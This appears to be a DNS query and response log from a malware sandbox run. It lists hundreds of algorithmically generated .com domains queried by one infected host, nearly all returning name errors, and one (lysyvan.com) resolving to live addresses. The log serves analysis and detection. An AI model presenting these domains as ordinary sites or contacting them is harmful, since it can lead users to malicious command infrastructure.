                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768692017 CEST192.168.2.41.1.1.10xc000Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.768870115 CEST192.168.2.41.1.1.10xad7aStandard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769068956 CEST192.168.2.41.1.1.10xc181Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769145012 CEST192.168.2.41.1.1.10xf712Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769341946 CEST192.168.2.41.1.1.10xc2dfStandard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769409895 CEST192.168.2.41.1.1.10x420fStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769598961 CEST192.168.2.41.1.1.10x2ed9Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769701958 CEST192.168.2.41.1.1.10x8a91Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769861937 CEST192.168.2.41.1.1.10xba75Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.769962072 CEST192.168.2.41.1.1.10x3dcbStandard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770124912 CEST192.168.2.41.1.1.10xcb5aStandard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770200014 CEST192.168.2.41.1.1.10xc972Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770445108 CEST192.168.2.41.1.1.10x4c0bStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770536900 CEST192.168.2.41.1.1.10x6e1eStandard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.770842075 CEST192.168.2.41.1.1.10x674aStandard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.771100044 CEST192.168.2.41.1.1.10xf279Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.771349907 CEST192.168.2.41.1.1.10x517Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.772331953 CEST192.168.2.41.1.1.10x54baStandard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773360968 CEST192.168.2.41.1.1.10x7718Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773536921 CEST192.168.2.41.1.1.10x8a1cStandard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773694992 CEST192.168.2.41.1.1.10xc79bStandard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.773853064 CEST192.168.2.41.1.1.10xa587Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.774285078 CEST192.168.2.41.1.1.10xb3a1Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.777992964 CEST192.168.2.41.1.1.10xf3cStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.790327072 CEST192.168.2.41.1.1.10x96d2Standard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.210016012 CEST192.168.2.41.1.1.10x3b39Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.211595058 CEST192.168.2.41.1.1.10x9b18Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.215580940 CEST192.168.2.41.1.1.10x30f8Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.221369028 CEST192.168.2.41.1.1.10xb08fStandard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.226690054 CEST192.168.2.41.1.1.10x166eStandard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228173018 CEST192.168.2.41.1.1.10xbbbeStandard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228216887 CEST192.168.2.41.1.1.10x62bdStandard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228676081 CEST192.168.2.41.1.1.10x426eStandard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228846073 CEST192.168.2.41.1.1.10x3714Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.229671955 CEST192.168.2.41.1.1.10xfc7eStandard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.230160952 CEST192.168.2.41.1.1.10xe327Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.230645895 CEST192.168.2.41.1.1.10xff5fStandard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.231177092 CEST192.168.2.41.1.1.10x58e9Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.231363058 CEST192.168.2.41.1.1.10xd3c2Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10xab70Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10xbaf4Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10x9f5Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10xe32cStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911037 CEST192.168.2.41.1.1.10x3bf0Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.233911991 CEST192.168.2.41.1.1.10x56eaStandard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.237330914 CEST192.168.2.41.1.1.10xdd66Standard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.237737894 CEST192.168.2.41.1.1.10x5230Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.238419056 CEST192.168.2.41.1.1.10x5059Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.238843918 CEST192.168.2.41.1.1.10x5dd9Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.257297039 CEST192.168.2.41.1.1.10xbf99Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.257448912 CEST192.168.2.41.1.1.10xbbcfStandard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.258627892 CEST192.168.2.41.1.1.10x5cc6Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.260452986 CEST192.168.2.41.1.1.10x7025Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.260626078 CEST192.168.2.41.1.1.10x6bc5Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.273396015 CEST192.168.2.41.1.1.10xd599Standard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.311527014 CEST192.168.2.41.1.1.10x8fcfStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.312026978 CEST192.168.2.41.1.1.10x1bf5Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.315844059 CEST192.168.2.41.1.1.10x2ba3Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.316405058 CEST192.168.2.41.1.1.10x87a8Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.318108082 CEST192.168.2.41.1.1.10x76a7Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.320091963 CEST192.168.2.41.1.1.10xa807Standard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.321826935 CEST192.168.2.41.1.1.10xe424Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.323683023 CEST192.168.2.41.1.1.10x23b9Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.325737953 CEST192.168.2.41.1.1.10x210fStandard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.326831102 CEST192.168.2.41.1.1.10x9315Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.332760096 CEST192.168.2.41.1.1.10x30fStandard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.336831093 CEST192.168.2.41.1.1.10xe286Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337210894 CEST192.168.2.41.1.1.10xdf8cStandard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337416887 CEST192.168.2.41.1.1.10x4c0aStandard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337573051 CEST192.168.2.41.1.1.10x767bStandard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.337711096 CEST192.168.2.41.1.1.10x78d7Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.112436056 CEST192.168.2.41.1.1.10xea76Standard query (0)vocyryf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.113472939 CEST192.168.2.41.1.1.10xc78fStandard query (0)lyryfyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.113696098 CEST192.168.2.41.1.1.10xd077Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.113910913 CEST192.168.2.41.1.1.10xbab0Standard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.114061117 CEST192.168.2.41.1.1.10x8327Standard query (0)qedynug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.114196062 CEST192.168.2.41.1.1.10x49acStandard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.114351034 CEST192.168.2.41.1.1.10x515Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.114481926 CEST192.168.2.41.1.1.10xbb83Standard query (0)vocyzum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.118571997 CEST192.168.2.41.1.1.10xc5c1Standard query (0)puzywag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.118786097 CEST192.168.2.41.1.1.10x854Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.119077921 CEST192.168.2.41.1.1.10x9680Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.119232893 CEST192.168.2.41.1.1.10xbe83Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.119308949 CEST192.168.2.41.1.1.10x476cStandard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.119838953 CEST192.168.2.41.1.1.10xa562Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120065928 CEST192.168.2.41.1.1.10x4664Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120213985 CEST192.168.2.41.1.1.10xfd04Standard query (0)qexyluq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120511055 CEST192.168.2.41.1.1.10xa52Standard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120678902 CEST192.168.2.41.1.1.10x626bStandard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.120853901 CEST192.168.2.41.1.1.10x3b9Standard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.121129036 CEST192.168.2.41.1.1.10x47deStandard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.121938944 CEST192.168.2.41.1.1.10x4f34Standard query (0)puzylyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.122144938 CEST192.168.2.41.1.1.10xf273Standard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.122472048 CEST192.168.2.41.1.1.10x851bStandard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.122711897 CEST192.168.2.41.1.1.10x3cbStandard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.122948885 CEST192.168.2.41.1.1.10xe031Standard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.123151064 CEST192.168.2.41.1.1.10xc1c3Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.123375893 CEST192.168.2.41.1.1.10x6702Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.123375893 CEST192.168.2.41.1.1.10x911fStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.123729944 CEST192.168.2.41.1.1.10x7f5Standard query (0)qexyreg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.126499891 CEST192.168.2.41.1.1.10xfa2aStandard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.144645929 CEST192.168.2.41.1.1.10x91faStandard query (0)qeqyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.652930021 CEST192.168.2.41.1.1.10x35dcStandard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.660661936 CEST192.168.2.41.1.1.10x6273Standard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.661938906 CEST192.168.2.41.1.1.10x2a7dStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.662643909 CEST192.168.2.41.1.1.10xdbe3Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.663322926 CEST192.168.2.41.1.1.10x7505Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.663394928 CEST192.168.2.41.1.1.10x4574Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.664316893 CEST192.168.2.41.1.1.10x7baaStandard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.667604923 CEST192.168.2.41.1.1.10xa4a7Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.672863007 CEST192.168.2.41.1.1.10x2c0bStandard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676167965 CEST192.168.2.41.1.1.10xad84Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676359892 CEST192.168.2.41.1.1.10x3171Standard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676527977 CEST192.168.2.41.1.1.10x6e1aStandard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676697016 CEST192.168.2.41.1.1.10xde42Standard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676851988 CEST192.168.2.41.1.1.10xeb3dStandard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.677021027 CEST192.168.2.41.1.1.10xbd77Standard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.677179098 CEST192.168.2.41.1.1.10xe1f3Standard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.680629015 CEST192.168.2.41.1.1.10x9018Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685269117 CEST192.168.2.41.1.1.10x45d4Standard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685430050 CEST192.168.2.41.1.1.10xed90Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685914993 CEST192.168.2.41.1.1.10x5d2Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.686244011 CEST192.168.2.41.1.1.10x49e2Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.686629057 CEST192.168.2.41.1.1.10x211bStandard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.686805010 CEST192.168.2.41.1.1.10xe082Standard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.687222004 CEST192.168.2.41.1.1.10xc724Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703248978 CEST192.168.2.41.1.1.10xab0cStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703458071 CEST192.168.2.41.1.1.10x4a2dStandard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703620911 CEST192.168.2.41.1.1.10x39bcStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703789949 CEST192.168.2.41.1.1.10x43dfStandard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703967094 CEST192.168.2.41.1.1.10xfba6Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.716984987 CEST192.168.2.41.1.1.10x5a25Standard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.747122049 CEST192.168.2.41.1.1.10xead9Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.749471903 CEST192.168.2.41.1.1.10x9556Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.751143932 CEST192.168.2.41.1.1.10xa841Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.751606941 CEST192.168.2.41.1.1.10xa9f8Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.753350019 CEST192.168.2.41.1.1.10x5f07Standard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.754793882 CEST192.168.2.41.1.1.10xf44cStandard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.755187035 CEST192.168.2.41.1.1.10x992cStandard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.758148909 CEST192.168.2.41.1.1.10xae8cStandard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.758996964 CEST192.168.2.41.1.1.10x1acdStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.764748096 CEST192.168.2.41.1.1.10x2ac5Standard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.764844894 CEST192.168.2.41.1.1.10xb166Standard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.764996052 CEST192.168.2.41.1.1.10xdbf9Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.774935007 CEST192.168.2.41.1.1.10xbfadStandard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775309086 CEST192.168.2.41.1.1.10xd60dStandard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775564909 CEST192.168.2.41.1.1.10x77cbStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775923967 CEST192.168.2.41.1.1.10x7d81Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.776046991 CEST192.168.2.41.1.1.10xd2eStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.777234077 CEST192.168.2.41.1.1.10xb0c0Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.778081894 CEST192.168.2.41.1.1.10x7aa3Standard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.780553102 CEST192.168.2.41.1.1.10x8514Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.780920029 CEST192.168.2.41.1.1.10x523eStandard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.781799078 CEST192.168.2.41.1.1.10x758dStandard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.781912088 CEST192.168.2.41.1.1.10xf036Standard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782001019 CEST192.168.2.41.1.1.10xf6c6Standard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782224894 CEST192.168.2.41.1.1.10xa6b4Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
Timestamp, Source IP, Dest IP, Trans ID, Reply Code, Name, CName, Address, Type, Class, DNS over HTTPS
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.557250023 CEST1.1.1.1192.168.2.40x200Name error (3)gaqyzuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.561888933 CEST1.1.1.1192.168.2.40x92ddName error (3)pufydep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.604087114 CEST1.1.1.1192.168.2.40xe7c4Name error (3)puvywav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.620193005 CEST1.1.1.1192.168.2.40xffbcName error (3)qetyxiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.622580051 CEST1.1.1.1192.168.2.40xd989Name error (3)gacyqob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.790548086 CEST1.1.1.1192.168.2.40xd76bName error (3)lygyfex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.816425085 CEST1.1.1.1192.168.2.40xe8d7Name error (3)gaqypiz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.818932056 CEST1.1.1.1192.168.2.40x5939Name error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.819936991 CEST1.1.1.1192.168.2.40x789fName error (3)gacykeh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.821455002 CEST1.1.1.1192.168.2.40xc8c0Name error (3)vonyryc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.821691036 CEST1.1.1.1192.168.2.40x400fName error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.821919918 CEST1.1.1.1192.168.2.40x370fName error (3)qetysal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.823097944 CEST1.1.1.1192.168.2.40xe1e9Name error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.826893091 CEST1.1.1.1192.168.2.40xb854Name error (3)qegynuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.828296900 CEST1.1.1.1192.168.2.40x437fName error (3)pujymip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.842627048 CEST1.1.1.1192.168.2.40x14dName error (3)lyvylyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.845694065 CEST1.1.1.1192.168.2.40xdf95No error (0)lysyvan.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.845694065 CEST1.1.1.1192.168.2.40xdf95No error (0)lysyvan.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.846892118 CEST1.1.1.1192.168.2.40xd7b9Name error (3)vocykem.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.848711014 CEST1.1.1.1192.168.2.40x81bbName error (3)vowyzuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.849436998 CEST1.1.1.1192.168.2.40xe25fName error (3)lymytux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:28.850117922 CEST1.1.1.1192.168.2.40xdb69Name error (3)pumytup.comnonenoneA (IP address)IN (0x0001)false
